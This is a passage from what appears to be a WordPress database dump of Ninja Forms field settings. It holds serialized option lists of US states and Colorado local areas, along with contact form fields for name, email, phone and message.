Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8854,234,'field_key','textbox_178','field_key','textbox_178'),(8855,234,'custom_name_attribute','','custom_name_attribute',''),(8856,234,'personally_identifiable','','personally_identifiable',''),(8857,234,'value','','value',''),(8858,235,'field_label','Last Name','field_label','Last Name'),(8859,235,'field_key','lastname_179','field_key','lastname_179'),(8860,235,'custom_name_attribute','lname','custom_name_attribute','lname'),(8861,235,'personally_identifiable','1','personally_identifiable','1'),(8862,235,'value','','value',''),(8863,236,'field_label','Email','field_label','Email'),(8864,236,'field_key','email_180','field_key','email_180'),(8865,236,'custom_name_attribute','email','custom_name_attribute','email'),(8866,236,'personally_identifiable','1','personally_identifiable','1'),(8867,236,'value','','value',''),(8868,237,'field_label','Phone','field_label','Phone'),(8869,237,'field_key','phone_181','field_key','phone_181'),(8870,237,'custom_name_attribute','phone','custom_name_attribute','phone'),(8871,237,'personally_identifiable','1','personally_identifiable','1'),(8872,237,'value','','value',''),(8873,238,'field_label','Your Local Area','field_label','Your Local Area'),(8874,238,'field_key','listselect_182','field_key','listselect_182'),(8879,241,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8880,241,'field_key','listselect_185','field_key','listselect_185'),(8881,242,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8882,242,'field_key','textarea_186','field_key','textarea_186'),(8883,242,'value','','value',''),(17421,616,'type','html','type','html'),(17422,616,'default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17420,616,'label','HTML','label','HTML'),(8886,244,'field_label','Submit','field_label','Submit'),(8887,244,'field_key','submit_188','field_key','submit_188'),(8897,247,'custom_name_attribute','lname','custom_name_attribute','lname'),(8898,247,'personally_identifiable','1','personally_identifiable','1'),(8899,247,'value','','value',''),(8900,248,'field_label','Email','field_label','Email'),(8901,248,'field_key','email_192','field_key','email_192'),(8902,248,'custom_name_attribute','email','custom_name_attribute','email'),(8903,248,'personally_identifiable','1','personally_identifiable','1'),(8904,248,'value','','value',''),(8905,249,'field_label','Phone','field_label','Phone'),(8906,249,'field_key','phone_193','field_key','phone_193'),(6537,227,'key','listselect_316','key','listselect_316'),(6538,227,'container_class','one-half','container_class','one-half'),(6539,227,'parent_id','21','parent_id','21'),(6540,228,'objectType','Field','objectType','Field'),(6541,228,'objectDomain','fields','objectDomain','fields'),(6542,228,'editActive','','editActive',''),(6543,228,'order','6','order','6'),(6544,228,'type','listcountry','type','listcountry'),(6545,228,'def_id','13','def_id','13'),(6546,228,'label','Country','label','Country'),(6547,228,'label_pos','above','label_pos','above'),(6548,228,'default_value','US','default_value','US'),(6549,228,'user_info_field_group','1','user_info_field_group','1'),(6550,228,'show_help','0','show_help','0'),(6551,228,'help_text','','help_text',''),(6552,228,'calc_auto_include','0','calc_auto_include','0'),(6553,228,'calc_option','0','calc_option','0'),(6554,228,'country_use_custom_first','0','country_use_custom_first','0'),(6555,228,'country_custom_first','','country_custom_first',''),(6556,228,'num_sort','0','num_sort','0'),(6557,228,'admin_label','','admin_label',''),(6558,228,'user_info_field_group_name','','user_info_field_group_name',''),(6559,228,'user_info_field_group_custom','','user_info_field_group_custom',''),(6560,228,'show_desc','0','show_desc','0'),(6561,228,'desc_pos','none','desc_pos','none'),(6562,228,'desc_text','','desc_text',''),(6563,228,'element_class','','element_class',''),(6564,228,'required','1','required','1'),(6565,228,'default','US','default','US'),(6566,228,'options','a:0:{}','options','a:0:{}'),(6567,228,'key','listcountry_317','key','listcountry_317'),(6568,228,'container_class','one-half','container_class','one-half'),(6569,228,'parent_id','21','parent_id','21'),(6570,229,'objectType','Field','objectType','Field'),(6571,229,'objectDomain','fields','objectDomain','fields'),(6572,229,'editActive','','editActive',''),(6573,229,'order','7','order','7'),(6574,229,'type','listmultiselect','type','listmultiselect'),(6575,229,'label','Choose your subscription(s) - <span style=\"font-size:12px\"><i> (Hold CTRL key for multiple selections)</i></span>','label','Choose your subscription(s) - <span style=\"font-size:12px\"><i> (Hold CTRL key for multiple selections)</i></span>'),(6576,229,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6577,229,'label_pos','above','label_pos','above'),(6578,229,'list_type','multi','list_type','multi'),(6579,229,'multi_size','4','multi_size','4'),(6580,229,'list_show_value','1','list_show_value','1'),(6581,229,'list','a:0:{}','list','a:0:{}'),(6582,229,'user_info_field_group','','user_info_field_group',''),(6583,229,'calc_auto_include','0','calc_auto_include','0'),(6584,229,'user_state','0','user_state','0'),(6585,229,'num_sort','0','num_sort','0'),(6586,229,'admin_label','','admin_label',''),(6587,229,'show_help','0','show_help','0'),(6588,229,'help_text','','help_text',''),(6589,229,'show_desc','0','show_desc','0'),(6590,229,'desc_pos','none','desc_pos','none'),(6591,229,'desc_text','','desc_text',''),(6592,229,'element_class','','element_class',''),(6593,229,'required','1','required','1'),(6594,229,'options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Colorado Springs\";s:5:\"value\";s:16:\"Colorado Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:39:\"Central Colorado/ECK Temple in Colorado\";s:5:\"value\";s:39:\"Central Colorado/ECK Temple in Colorado\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Colorado Springs\";s:5:\"value\";s:16:\"Colorado Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:39:\"Central Colorado/ECK Temple in Colorado\";s:5:\"value\";s:39:\"Central Colorado/ECK Temple in Colorado\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 